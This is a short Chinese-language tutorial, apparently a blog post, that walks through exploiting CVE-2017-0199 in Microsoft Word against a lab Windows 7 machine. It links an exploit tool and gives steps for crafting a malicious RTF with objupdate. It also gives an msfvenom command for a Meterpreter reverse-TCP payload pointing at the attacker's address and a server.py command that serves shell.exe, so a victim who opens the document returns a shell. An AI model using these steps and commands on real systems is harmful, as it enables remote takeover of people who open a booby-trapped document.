你打开我的word,就会被我控制(CVE-2017-0199)

准备工作:
攻击者电脑(kali):192.168.1.130
被攻击者电脑(win7):192.168.115
下载漏洞利用工具:https://github.com/haibara3839/CVE-2017-0199-master
把innocent.doc和server.py两个文件放到攻击者电脑上,并开启Apache服务
漏洞利用:
1、新建个word,向下面这样配置


2、保存成RTF格式


3、使用记事本打开test.rtf文件,在文件中查找objautlink,然后在objautlink后面插入objupdate


4、然后配置反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f exe > shell.exe
5、运行server.py服务

先把Apache服务关闭
python server.py 80 http://192.168.1.130/shell.exe /var/www/html/shell.exe
被攻击端打开word,点击是


成功返回shell

推荐阅读更多精彩内容